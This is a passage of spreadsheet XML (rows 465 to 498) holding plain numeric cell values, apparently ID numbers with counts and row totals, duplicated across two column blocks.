        <v>1</v>
      </c>
      <c r="D465" s="8">
        <v>0</v>
      </c>
      <c r="E465" s="8">
        <v>0</v>
      </c>
      <c r="F465" s="8">
        <v>87</v>
      </c>
      <c r="G465" s="8">
        <v>415</v>
      </c>
      <c r="H465" s="8">
        <v>528</v>
      </c>
      <c r="K465" s="7">
        <v>1166</v>
      </c>
      <c r="L465" s="8">
        <v>25</v>
      </c>
      <c r="M465" s="8">
        <v>1</v>
      </c>
      <c r="N465" s="8">
        <v>0</v>
      </c>
      <c r="O465" s="8">
        <v>0</v>
      </c>
      <c r="P465" s="8">
        <v>87</v>
      </c>
      <c r="Q465" s="8">
        <v>415</v>
      </c>
    </row>
    <row r="466" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A466" s="7">
        <v>1170</v>
      </c>
      <c r="B466" s="8">
        <v>25</v>
      </c>
      <c r="C466" s="8">
        <v>1</v>
      </c>
      <c r="D466" s="8">
        <v>0</v>
      </c>
      <c r="E466" s="8">
        <v>0</v>
      </c>
      <c r="F466" s="8">
        <v>12</v>
      </c>
      <c r="G466" s="8">
        <v>2</v>
      </c>
      <c r="H466" s="8">
        <v>40</v>
      </c>
      <c r="K466" s="7">
        <v>1170</v>
      </c>
      <c r="L466" s="8">
        <v>25</v>
      </c>
      <c r="M466" s="8">
        <v>1</v>
      </c>
      <c r="N466" s="8">
        <v>0</v>
      </c>
      <c r="O466" s="8">
        <v>0</v>
      </c>
      <c r="P466" s="8">
        <v>12</v>
      </c>
      <c r="Q466" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="467" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A467" s="7">
        <v>1175</v>
      </c>
      <c r="B467" s="8">
        <v>6</v>
      </c>
      <c r="C467" s="8">
        <v>0</v>
      </c>
      <c r="D467" s="8">
        <v>0</v>
      </c>
      <c r="E467" s="8">
        <v>0</v>
      </c>
      <c r="F467" s="8">
        <v>3</v>
      </c>
      <c r="G467" s="8">
        <v>0</v>
      </c>
      <c r="H467" s="8">
        <v>9</v>
      </c>
      <c r="K467" s="7">
        <v>1175</v>
      </c>
      <c r="L467" s="8">
        <v>6</v>
      </c>
      <c r="M467" s="8">
        <v>0</v>
      </c>
      <c r="N467" s="8">
        <v>0</v>
      </c>
      <c r="O467" s="8">
        <v>0</v>
      </c>
      <c r="P467" s="8">
        <v>3</v>
      </c>
      <c r="Q467" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="468" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A468" s="7">
        <v>1177</v>
      </c>
      <c r="B468" s="8">
        <v>28</v>
      </c>
      <c r="C468" s="8">
        <v>0</v>
      </c>
      <c r="D468" s="8">
        <v>0</v>
      </c>
      <c r="E468" s="8">
        <v>0</v>
      </c>
      <c r="F468" s="8">
        <v>11</v>
      </c>
      <c r="G468" s="8">
        <v>0</v>
      </c>
      <c r="H468" s="8">
        <v>39</v>
      </c>
      <c r="K468" s="7">
        <v>1177</v>
      </c>
      <c r="L468" s="8">
        <v>28</v>
      </c>
      <c r="M468" s="8">
        <v>0</v>
      </c>
      <c r="N468" s="8">
        <v>0</v>
      </c>
      <c r="O468" s="8">
        <v>0</v>
      </c>
      <c r="P468" s="8">
        <v>11</v>
      </c>
      <c r="Q468" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="469" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A469" s="7">
        <v>1178</v>
      </c>
      <c r="B469" s="8">
        <v>26</v>
      </c>
      <c r="C469" s="8">
        <v>0</v>
      </c>
      <c r="D469" s="8">
        <v>0</v>
      </c>
      <c r="E469" s="8">
        <v>0</v>
      </c>
      <c r="F469" s="8">
        <v>1</v>
      </c>
      <c r="G469" s="8">
        <v>13</v>
      </c>
      <c r="H469" s="8">
        <v>40</v>
      </c>
      <c r="K469" s="7">
        <v>1178</v>
      </c>
      <c r="L469" s="8">
        <v>26</v>
      </c>
      <c r="M469" s="8">
        <v>0</v>
      </c>
      <c r="N469" s="8">
        <v>0</v>
      </c>
      <c r="O469" s="8">
        <v>0</v>
      </c>
      <c r="P469" s="8">
        <v>1</v>
      </c>
      <c r="Q469" s="8">
        <v>13</v>
      </c>
    </row>
    <row r="470" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A470" s="7">
        <v>1180</v>
      </c>
      <c r="B470" s="8">
        <v>24</v>
      </c>
      <c r="C470" s="8">
        <v>1</v>
      </c>
      <c r="D470" s="8">
        <v>0</v>
      </c>
      <c r="E470" s="8">
        <v>1</v>
      </c>
      <c r="F470" s="8">
        <v>2</v>
      </c>
      <c r="G470" s="8">
        <v>2</v>
      </c>
      <c r="H470" s="8">
        <v>30</v>
      </c>
      <c r="K470" s="7">
        <v>1180</v>
      </c>
      <c r="L470" s="8">
        <v>24</v>
      </c>
      <c r="M470" s="8">
        <v>1</v>
      </c>
      <c r="N470" s="8">
        <v>0</v>
      </c>
      <c r="O470" s="8">
        <v>1</v>
      </c>
      <c r="P470" s="8">
        <v>2</v>
      </c>
      <c r="Q470" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="471" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A471" s="7">
        <v>1182</v>
      </c>
      <c r="B471" s="8">
        <v>25</v>
      </c>
      <c r="C471" s="8">
        <v>0</v>
      </c>
      <c r="D471" s="8">
        <v>32</v>
      </c>
      <c r="E471" s="8">
        <v>70</v>
      </c>
      <c r="F471" s="8">
        <v>32</v>
      </c>
      <c r="G471" s="8">
        <v>12</v>
      </c>
      <c r="H471" s="8">
        <v>171</v>
      </c>
      <c r="K471" s="7">
        <v>1182</v>
      </c>
      <c r="L471" s="8">
        <v>25</v>
      </c>
      <c r="M471" s="8">
        <v>0</v>
      </c>
      <c r="N471" s="8">
        <v>32</v>
      </c>
      <c r="O471" s="8">
        <v>70</v>
      </c>
      <c r="P471" s="8">
        <v>32</v>
      </c>
      <c r="Q471" s="8">
        <v>12</v>
      </c>
    </row>
    <row r="472" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A472" s="7">
        <v>1183</v>
      </c>
      <c r="B472" s="8">
        <v>25</v>
      </c>
      <c r="C472" s="8">
        <v>1</v>
      </c>
      <c r="D472" s="8">
        <v>6</v>
      </c>
      <c r="E472" s="8">
        <v>3</v>
      </c>
      <c r="F472" s="8">
        <v>8</v>
      </c>
      <c r="G472" s="8">
        <v>9</v>
      </c>
      <c r="H472" s="8">
        <v>52</v>
      </c>
      <c r="K472" s="7">
        <v>1183</v>
      </c>
      <c r="L472" s="8">
        <v>25</v>
      </c>
      <c r="M472" s="8">
        <v>1</v>
      </c>
      <c r="N472" s="8">
        <v>6</v>
      </c>
      <c r="O472" s="8">
        <v>3</v>
      </c>
      <c r="P472" s="8">
        <v>8</v>
      </c>
      <c r="Q472" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="473" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A473" s="7">
        <v>1190</v>
      </c>
      <c r="B473" s="8">
        <v>26</v>
      </c>
      <c r="C473" s="8">
        <v>0</v>
      </c>
      <c r="D473" s="8">
        <v>2</v>
      </c>
      <c r="E473" s="8">
        <v>3</v>
      </c>
      <c r="F473" s="8">
        <v>8</v>
      </c>
      <c r="G473" s="8">
        <v>4</v>
      </c>
      <c r="H473" s="8">
        <v>43</v>
      </c>
      <c r="K473" s="7">
        <v>1190</v>
      </c>
      <c r="L473" s="8">
        <v>26</v>
      </c>
      <c r="M473" s="8">
        <v>0</v>
      </c>
      <c r="N473" s="8">
        <v>2</v>
      </c>
      <c r="O473" s="8">
        <v>3</v>
      </c>
      <c r="P473" s="8">
        <v>8</v>
      </c>
      <c r="Q473" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="474" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A474" s="7">
        <v>1192</v>
      </c>
      <c r="B474" s="8">
        <v>26</v>
      </c>
      <c r="C474" s="8">
        <v>0</v>
      </c>
      <c r="D474" s="8">
        <v>8</v>
      </c>
      <c r="E474" s="8">
        <v>7</v>
      </c>
      <c r="F474" s="8">
        <v>9</v>
      </c>
      <c r="G474" s="8">
        <v>4</v>
      </c>
      <c r="H474" s="8">
        <v>54</v>
      </c>
      <c r="K474" s="7">
        <v>1192</v>
      </c>
      <c r="L474" s="8">
        <v>26</v>
      </c>
      <c r="M474" s="8">
        <v>0</v>
      </c>
      <c r="N474" s="8">
        <v>8</v>
      </c>
      <c r="O474" s="8">
        <v>7</v>
      </c>
      <c r="P474" s="8">
        <v>9</v>
      </c>
      <c r="Q474" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="475" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A475" s="7">
        <v>1195</v>
      </c>
      <c r="B475" s="8">
        <v>26</v>
      </c>
      <c r="C475" s="8">
        <v>1</v>
      </c>
      <c r="D475" s="8">
        <v>5</v>
      </c>
      <c r="E475" s="8">
        <v>16</v>
      </c>
      <c r="F475" s="8">
        <v>6</v>
      </c>
      <c r="G475" s="8">
        <v>2</v>
      </c>
      <c r="H475" s="8">
        <v>56</v>
      </c>
      <c r="K475" s="7">
        <v>1195</v>
      </c>
      <c r="L475" s="8">
        <v>26</v>
      </c>
      <c r="M475" s="8">
        <v>1</v>
      </c>
      <c r="N475" s="8">
        <v>5</v>
      </c>
      <c r="O475" s="8">
        <v>16</v>
      </c>
      <c r="P475" s="8">
        <v>6</v>
      </c>
      <c r="Q475" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="476" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A476" s="7">
        <v>1197</v>
      </c>
      <c r="B476" s="8">
        <v>25</v>
      </c>
      <c r="C476" s="8">
        <v>1</v>
      </c>
      <c r="D476" s="8">
        <v>22</v>
      </c>
      <c r="E476" s="8">
        <v>10</v>
      </c>
      <c r="F476" s="8">
        <v>12</v>
      </c>
      <c r="G476" s="8">
        <v>14</v>
      </c>
      <c r="H476" s="8">
        <v>84</v>
      </c>
      <c r="K476" s="7">
        <v>1197</v>
      </c>
      <c r="L476" s="8">
        <v>25</v>
      </c>
      <c r="M476" s="8">
        <v>1</v>
      </c>
      <c r="N476" s="8">
        <v>22</v>
      </c>
      <c r="O476" s="8">
        <v>10</v>
      </c>
      <c r="P476" s="8">
        <v>12</v>
      </c>
      <c r="Q476" s="8">
        <v>14</v>
      </c>
    </row>
    <row r="477" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A477" s="7">
        <v>1198</v>
      </c>
      <c r="B477" s="8">
        <v>25</v>
      </c>
      <c r="C477" s="8">
        <v>1</v>
      </c>
      <c r="D477" s="8">
        <v>0</v>
      </c>
      <c r="E477" s="8">
        <v>0</v>
      </c>
      <c r="F477" s="8">
        <v>27</v>
      </c>
      <c r="G477" s="8">
        <v>6</v>
      </c>
      <c r="H477" s="8">
        <v>59</v>
      </c>
      <c r="K477" s="7">
        <v>1198</v>
      </c>
      <c r="L477" s="8">
        <v>25</v>
      </c>
      <c r="M477" s="8">
        <v>1</v>
      </c>
      <c r="N477" s="8">
        <v>0</v>
      </c>
      <c r="O477" s="8">
        <v>0</v>
      </c>
      <c r="P477" s="8">
        <v>27</v>
      </c>
      <c r="Q477" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="478" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A478" s="7">
        <v>1199</v>
      </c>
      <c r="B478" s="8">
        <v>0</v>
      </c>
      <c r="C478" s="8">
        <v>0</v>
      </c>
      <c r="D478" s="8">
        <v>29</v>
      </c>
      <c r="E478" s="8">
        <v>22</v>
      </c>
      <c r="F478" s="8">
        <v>4</v>
      </c>
      <c r="G478" s="8">
        <v>7</v>
      </c>
      <c r="H478" s="8">
        <v>62</v>
      </c>
      <c r="K478" s="7">
        <v>1199</v>
      </c>
      <c r="L478" s="8">
        <v>0</v>
      </c>
      <c r="M478" s="8">
        <v>0</v>
      </c>
      <c r="N478" s="8">
        <v>29</v>
      </c>
      <c r="O478" s="8">
        <v>22</v>
      </c>
      <c r="P478" s="8">
        <v>4</v>
      </c>
      <c r="Q478" s="8">
        <v>7</v>
      </c>
    </row>
    <row r="479" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A479" s="7">
        <v>1200</v>
      </c>
      <c r="B479" s="8">
        <v>24</v>
      </c>
      <c r="C479" s="8">
        <v>2</v>
      </c>
      <c r="D479" s="8">
        <v>0</v>
      </c>
      <c r="E479" s="8">
        <v>0</v>
      </c>
      <c r="F479" s="8">
        <v>14</v>
      </c>
      <c r="G479" s="8">
        <v>4</v>
      </c>
      <c r="H479" s="8">
        <v>44</v>
      </c>
      <c r="K479" s="7">
        <v>1200</v>
      </c>
      <c r="L479" s="8">
        <v>24</v>
      </c>
      <c r="M479" s="8">
        <v>2</v>
      </c>
      <c r="N479" s="8">
        <v>0</v>
      </c>
      <c r="O479" s="8">
        <v>0</v>
      </c>
      <c r="P479" s="8">
        <v>14</v>
      </c>
      <c r="Q479" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="480" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A480" s="7">
        <v>1202</v>
      </c>
      <c r="B480" s="8">
        <v>25</v>
      </c>
      <c r="C480" s="8">
        <v>1</v>
      </c>
      <c r="D480" s="8">
        <v>14</v>
      </c>
      <c r="E480" s="8">
        <v>19</v>
      </c>
      <c r="F480" s="8">
        <v>5</v>
      </c>
      <c r="G480" s="8">
        <v>6</v>
      </c>
      <c r="H480" s="8">
        <v>70</v>
      </c>
      <c r="K480" s="7">
        <v>1202</v>
      </c>
      <c r="L480" s="8">
        <v>25</v>
      </c>
      <c r="M480" s="8">
        <v>1</v>
      </c>
      <c r="N480" s="8">
        <v>14</v>
      </c>
      <c r="O480" s="8">
        <v>19</v>
      </c>
      <c r="P480" s="8">
        <v>5</v>
      </c>
      <c r="Q480" s="8">
        <v>6</v>
      </c>
    </row>
    <row r="481" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A481" s="7">
        <v>1206</v>
      </c>
      <c r="B481" s="8">
        <v>0</v>
      </c>
      <c r="C481" s="8">
        <v>0</v>
      </c>
      <c r="D481" s="8">
        <v>0</v>
      </c>
      <c r="E481" s="8">
        <v>0</v>
      </c>
      <c r="F481" s="8">
        <v>6</v>
      </c>
      <c r="G481" s="8">
        <v>5</v>
      </c>
      <c r="H481" s="8">
        <v>11</v>
      </c>
      <c r="K481" s="7">
        <v>1206</v>
      </c>
      <c r="L481" s="8">
        <v>0</v>
      </c>
      <c r="M481" s="8">
        <v>0</v>
      </c>
      <c r="N481" s="8">
        <v>0</v>
      </c>
      <c r="O481" s="8">
        <v>0</v>
      </c>
      <c r="P481" s="8">
        <v>6</v>
      </c>
      <c r="Q481" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="482" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A482" s="7">
        <v>1208</v>
      </c>
      <c r="B482" s="8">
        <v>22</v>
      </c>
      <c r="C482" s="8">
        <v>1</v>
      </c>
      <c r="D482" s="8">
        <v>0</v>
      </c>
      <c r="E482" s="8">
        <v>0</v>
      </c>
      <c r="F482" s="8">
        <v>14</v>
      </c>
      <c r="G482" s="8">
        <v>14</v>
      </c>
      <c r="H482" s="8">
        <v>51</v>
      </c>
      <c r="K482" s="7">
        <v>1208</v>
      </c>
      <c r="L482" s="8">
        <v>22</v>
      </c>
      <c r="M482" s="8">
        <v>1</v>
      </c>
      <c r="N482" s="8">
        <v>0</v>
      </c>
      <c r="O482" s="8">
        <v>0</v>
      </c>
      <c r="P482" s="8">
        <v>14</v>
      </c>
      <c r="Q482" s="8">
        <v>14</v>
      </c>
    </row>
    <row r="483" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A483" s="7">
        <v>1210</v>
      </c>
      <c r="B483" s="8">
        <v>30</v>
      </c>
      <c r="C483" s="8">
        <v>1</v>
      </c>
      <c r="D483" s="8">
        <v>5</v>
      </c>
      <c r="E483" s="8">
        <v>0</v>
      </c>
      <c r="F483" s="8">
        <v>4</v>
      </c>
      <c r="G483" s="8">
        <v>1</v>
      </c>
      <c r="H483" s="8">
        <v>41</v>
      </c>
      <c r="K483" s="7">
        <v>1210</v>
      </c>
      <c r="L483" s="8">
        <v>30</v>
      </c>
      <c r="M483" s="8">
        <v>1</v>
      </c>
      <c r="N483" s="8">
        <v>5</v>
      </c>
      <c r="O483" s="8">
        <v>0</v>
      </c>
      <c r="P483" s="8">
        <v>4</v>
      </c>
      <c r="Q483" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="484" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A484" s="7">
        <v>1211</v>
      </c>
      <c r="B484" s="8">
        <v>30</v>
      </c>
      <c r="C484" s="8">
        <v>1</v>
      </c>
      <c r="D484" s="8">
        <v>4</v>
      </c>
      <c r="E484" s="8">
        <v>22</v>
      </c>
      <c r="F484" s="8">
        <v>2</v>
      </c>
      <c r="G484" s="8">
        <v>4</v>
      </c>
      <c r="H484" s="8">
        <v>63</v>
      </c>
      <c r="K484" s="7">
        <v>1211</v>
      </c>
      <c r="L484" s="8">
        <v>30</v>
      </c>
      <c r="M484" s="8">
        <v>1</v>
      </c>
      <c r="N484" s="8">
        <v>4</v>
      </c>
      <c r="O484" s="8">
        <v>22</v>
      </c>
      <c r="P484" s="8">
        <v>2</v>
      </c>
      <c r="Q484" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="485" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A485" s="7">
        <v>1213</v>
      </c>
      <c r="B485" s="8">
        <v>26</v>
      </c>
      <c r="C485" s="8">
        <v>1</v>
      </c>
      <c r="D485" s="8">
        <v>8</v>
      </c>
      <c r="E485" s="8">
        <v>11</v>
      </c>
      <c r="F485" s="8">
        <v>7</v>
      </c>
      <c r="G485" s="8">
        <v>5</v>
      </c>
      <c r="H485" s="8">
        <v>58</v>
      </c>
      <c r="K485" s="7">
        <v>1213</v>
      </c>
      <c r="L485" s="8">
        <v>26</v>
      </c>
      <c r="M485" s="8">
        <v>1</v>
      </c>
      <c r="N485" s="8">
        <v>8</v>
      </c>
      <c r="O485" s="8">
        <v>11</v>
      </c>
      <c r="P485" s="8">
        <v>7</v>
      </c>
      <c r="Q485" s="8">
        <v>5</v>
      </c>
    </row>
    <row r="486" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A486" s="7">
        <v>1215</v>
      </c>
      <c r="B486" s="8">
        <v>28</v>
      </c>
      <c r="C486" s="8">
        <v>1</v>
      </c>
      <c r="D486" s="8">
        <v>15</v>
      </c>
      <c r="E486" s="8">
        <v>25</v>
      </c>
      <c r="F486" s="8">
        <v>3</v>
      </c>
      <c r="G486" s="8">
        <v>3</v>
      </c>
      <c r="H486" s="8">
        <v>75</v>
      </c>
      <c r="K486" s="7">
        <v>1215</v>
      </c>
      <c r="L486" s="8">
        <v>28</v>
      </c>
      <c r="M486" s="8">
        <v>1</v>
      </c>
      <c r="N486" s="8">
        <v>15</v>
      </c>
      <c r="O486" s="8">
        <v>25</v>
      </c>
      <c r="P486" s="8">
        <v>3</v>
      </c>
      <c r="Q486" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="487" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A487" s="7">
        <v>1216</v>
      </c>
      <c r="B487" s="8">
        <v>21</v>
      </c>
      <c r="C487" s="8">
        <v>1</v>
      </c>
      <c r="D487" s="8">
        <v>10</v>
      </c>
      <c r="E487" s="8">
        <v>0</v>
      </c>
      <c r="F487" s="8">
        <v>86</v>
      </c>
      <c r="G487" s="8">
        <v>43</v>
      </c>
      <c r="H487" s="8">
        <v>161</v>
      </c>
      <c r="K487" s="7">
        <v>1216</v>
      </c>
      <c r="L487" s="8">
        <v>21</v>
      </c>
      <c r="M487" s="8">
        <v>1</v>
      </c>
      <c r="N487" s="8">
        <v>10</v>
      </c>
      <c r="O487" s="8">
        <v>0</v>
      </c>
      <c r="P487" s="8">
        <v>86</v>
      </c>
      <c r="Q487" s="8">
        <v>43</v>
      </c>
    </row>
    <row r="488" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A488" s="7">
        <v>1222</v>
      </c>
      <c r="B488" s="8">
        <v>24</v>
      </c>
      <c r="C488" s="8">
        <v>0</v>
      </c>
      <c r="D488" s="8">
        <v>0</v>
      </c>
      <c r="E488" s="8">
        <v>0</v>
      </c>
      <c r="F488" s="8">
        <v>11</v>
      </c>
      <c r="G488" s="8">
        <v>3</v>
      </c>
      <c r="H488" s="8">
        <v>38</v>
      </c>
      <c r="K488" s="7">
        <v>1222</v>
      </c>
      <c r="L488" s="8">
        <v>24</v>
      </c>
      <c r="M488" s="8">
        <v>0</v>
      </c>
      <c r="N488" s="8">
        <v>0</v>
      </c>
      <c r="O488" s="8">
        <v>0</v>
      </c>
      <c r="P488" s="8">
        <v>11</v>
      </c>
      <c r="Q488" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="489" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A489" s="7">
        <v>1223</v>
      </c>
      <c r="B489" s="8">
        <v>26</v>
      </c>
      <c r="C489" s="8">
        <v>0</v>
      </c>
      <c r="D489" s="8">
        <v>5</v>
      </c>
      <c r="E489" s="8">
        <v>23</v>
      </c>
      <c r="F489" s="8">
        <v>2</v>
      </c>
      <c r="G489" s="8">
        <v>4</v>
      </c>
      <c r="H489" s="8">
        <v>60</v>
      </c>
      <c r="K489" s="7">
        <v>1223</v>
      </c>
      <c r="L489" s="8">
        <v>26</v>
      </c>
      <c r="M489" s="8">
        <v>0</v>
      </c>
      <c r="N489" s="8">
        <v>5</v>
      </c>
      <c r="O489" s="8">
        <v>23</v>
      </c>
      <c r="P489" s="8">
        <v>2</v>
      </c>
      <c r="Q489" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="490" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A490" s="7">
        <v>1224</v>
      </c>
      <c r="B490" s="8">
        <v>25</v>
      </c>
      <c r="C490" s="8">
        <v>0</v>
      </c>
      <c r="D490" s="8">
        <v>16</v>
      </c>
      <c r="E490" s="8">
        <v>0</v>
      </c>
      <c r="F490" s="8">
        <v>5</v>
      </c>
      <c r="G490" s="8">
        <v>0</v>
      </c>
      <c r="H490" s="8">
        <v>46</v>
      </c>
      <c r="K490" s="7">
        <v>1224</v>
      </c>
      <c r="L490" s="8">
        <v>25</v>
      </c>
      <c r="M490" s="8">
        <v>0</v>
      </c>
      <c r="N490" s="8">
        <v>16</v>
      </c>
      <c r="O490" s="8">
        <v>0</v>
      </c>
      <c r="P490" s="8">
        <v>5</v>
      </c>
      <c r="Q490" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="491" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A491" s="7">
        <v>1229</v>
      </c>
      <c r="B491" s="8">
        <v>30</v>
      </c>
      <c r="C491" s="8">
        <v>8</v>
      </c>
      <c r="D491" s="8">
        <v>0</v>
      </c>
      <c r="E491" s="8">
        <v>0</v>
      </c>
      <c r="F491" s="8">
        <v>15</v>
      </c>
      <c r="G491" s="8">
        <v>31</v>
      </c>
      <c r="H491" s="8">
        <v>84</v>
      </c>
      <c r="K491" s="7">
        <v>1229</v>
      </c>
      <c r="L491" s="8">
        <v>30</v>
      </c>
      <c r="M491" s="8">
        <v>8</v>
      </c>
      <c r="N491" s="8">
        <v>0</v>
      </c>
      <c r="O491" s="8">
        <v>0</v>
      </c>
      <c r="P491" s="8">
        <v>15</v>
      </c>
      <c r="Q491" s="8">
        <v>31</v>
      </c>
    </row>
    <row r="492" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A492" s="7">
        <v>1230</v>
      </c>
      <c r="B492" s="8">
        <v>0</v>
      </c>
      <c r="C492" s="8">
        <v>0</v>
      </c>
      <c r="D492" s="8">
        <v>6</v>
      </c>
      <c r="E492" s="8">
        <v>14</v>
      </c>
      <c r="F492" s="8">
        <v>4</v>
      </c>
      <c r="G492" s="8">
        <v>20</v>
      </c>
      <c r="H492" s="8">
        <v>44</v>
      </c>
      <c r="K492" s="7">
        <v>1230</v>
      </c>
      <c r="L492" s="8">
        <v>0</v>
      </c>
      <c r="M492" s="8">
        <v>0</v>
      </c>
      <c r="N492" s="8">
        <v>6</v>
      </c>
      <c r="O492" s="8">
        <v>14</v>
      </c>
      <c r="P492" s="8">
        <v>4</v>
      </c>
      <c r="Q492" s="8">
        <v>20</v>
      </c>
    </row>
    <row r="493" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A493" s="7">
        <v>1232</v>
      </c>
      <c r="B493" s="8">
        <v>0</v>
      </c>
      <c r="C493" s="8">
        <v>0</v>
      </c>
      <c r="D493" s="8">
        <v>13</v>
      </c>
      <c r="E493" s="8">
        <v>4</v>
      </c>
      <c r="F493" s="8">
        <v>2</v>
      </c>
      <c r="G493" s="8">
        <v>0</v>
      </c>
      <c r="H493" s="8">
        <v>19</v>
      </c>
      <c r="K493" s="7">
        <v>1232</v>
      </c>
      <c r="L493" s="8">
        <v>0</v>
      </c>
      <c r="M493" s="8">
        <v>0</v>
      </c>
      <c r="N493" s="8">
        <v>13</v>
      </c>
      <c r="O493" s="8">
        <v>4</v>
      </c>
      <c r="P493" s="8">
        <v>2</v>
      </c>
      <c r="Q493" s="8">
        <v>0</v>
      </c>
    </row>
    <row r="494" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A494" s="7">
        <v>1234</v>
      </c>
      <c r="B494" s="8">
        <v>26</v>
      </c>
      <c r="C494" s="8">
        <v>0</v>
      </c>
      <c r="D494" s="8">
        <v>15</v>
      </c>
      <c r="E494" s="8">
        <v>15</v>
      </c>
      <c r="F494" s="8">
        <v>25</v>
      </c>
      <c r="G494" s="8">
        <v>33</v>
      </c>
      <c r="H494" s="8">
        <v>114</v>
      </c>
      <c r="K494" s="7">
        <v>1234</v>
      </c>
      <c r="L494" s="8">
        <v>26</v>
      </c>
      <c r="M494" s="8">
        <v>0</v>
      </c>
      <c r="N494" s="8">
        <v>15</v>
      </c>
      <c r="O494" s="8">
        <v>15</v>
      </c>
      <c r="P494" s="8">
        <v>25</v>
      </c>
      <c r="Q494" s="8">
        <v>33</v>
      </c>
    </row>
    <row r="495" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A495" s="7">
        <v>1235</v>
      </c>
      <c r="B495" s="8">
        <v>0</v>
      </c>
      <c r="C495" s="8">
        <v>1</v>
      </c>
      <c r="D495" s="8">
        <v>15</v>
      </c>
      <c r="E495" s="8">
        <v>0</v>
      </c>
      <c r="F495" s="8">
        <v>4</v>
      </c>
      <c r="G495" s="8">
        <v>4</v>
      </c>
      <c r="H495" s="8">
        <v>24</v>
      </c>
      <c r="K495" s="7">
        <v>1235</v>
      </c>
      <c r="L495" s="8">
        <v>0</v>
      </c>
      <c r="M495" s="8">
        <v>1</v>
      </c>
      <c r="N495" s="8">
        <v>15</v>
      </c>
      <c r="O495" s="8">
        <v>0</v>
      </c>
      <c r="P495" s="8">
        <v>4</v>
      </c>
      <c r="Q495" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="496" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A496" s="7">
        <v>1237</v>
      </c>
      <c r="B496" s="8">
        <v>24</v>
      </c>
      <c r="C496" s="8">
        <v>1</v>
      </c>
      <c r="D496" s="8">
        <v>12</v>
      </c>
      <c r="E496" s="8">
        <v>36</v>
      </c>
      <c r="F496" s="8">
        <v>2</v>
      </c>
      <c r="G496" s="8">
        <v>4</v>
      </c>
      <c r="H496" s="8">
        <v>79</v>
      </c>
      <c r="K496" s="7">
        <v>1237</v>
      </c>
      <c r="L496" s="8">
        <v>24</v>
      </c>
      <c r="M496" s="8">
        <v>1</v>
      </c>
      <c r="N496" s="8">
        <v>12</v>
      </c>
      <c r="O496" s="8">
        <v>36</v>
      </c>
      <c r="P496" s="8">
        <v>2</v>
      </c>
      <c r="Q496" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="497" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A497" s="7">
        <v>1238</v>
      </c>
      <c r="B497" s="8">
        <v>24</v>
      </c>
      <c r="C497" s="8">
        <v>3</v>
      </c>
      <c r="D497" s="8">
        <v>141</v>
      </c>
      <c r="E497" s="8">
        <v>108</v>
      </c>
      <c r="F497" s="8">
        <v>18</v>
      </c>
      <c r="G497" s="8">
        <v>9</v>
      </c>
      <c r="H497" s="8">
        <v>303</v>
      </c>
      <c r="K497" s="7">
        <v>1238</v>
      </c>
      <c r="L497" s="8">
        <v>24</v>
      </c>
      <c r="M497" s="8">
        <v>3</v>
      </c>
      <c r="N497" s="8">
        <v>141</v>
      </c>
      <c r="O497" s="8">
        <v>108</v>
      </c>
      <c r="P497" s="8">
        <v>18</v>
      </c>
      <c r="Q497" s="8">
        <v>9</v>
      </c>
    </row>
    <row r="498" spans="1:17" x14ac:dyDescent="0.2">
      <c r="A498" s="7">
        <v>1240</v>
      </c>
      <c r="B498" s="8">
        <v>25</v>
      </c>
      <c r="C498" s="8">
        <v>1</v>
      </c>
      <c r="D498" s="8">
        <v>10</v>
      </c>
      <c r="E498" s="8">
        <v>1</v>
      </c>
      <c r="F498" s="8">
        <v>17</v>
      </c>
      <c r="G498" s="8">
        <v>4</v>
      </c>
      <c r="H498" s="8">
        <v>58</v>
      </c>
      <c r="K498" s="7">
        <v>1240</v>
      </c>
      <c r="L498" s="8">
        <v>25</v>
      </c>
      <c r="M498" s="8">
        <v>1</v>
      </c>
      <c r="N498" s="8">
        <v>10</v>
      </c>
      <c r="O498" s="8">
        <v>1</v>
      </c>
      <c r="P498" s="8">
        <v>17</v>
      </c>
      <c r="Q498" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="499" spans="1:17" x14ac:dyDescent="0.2">
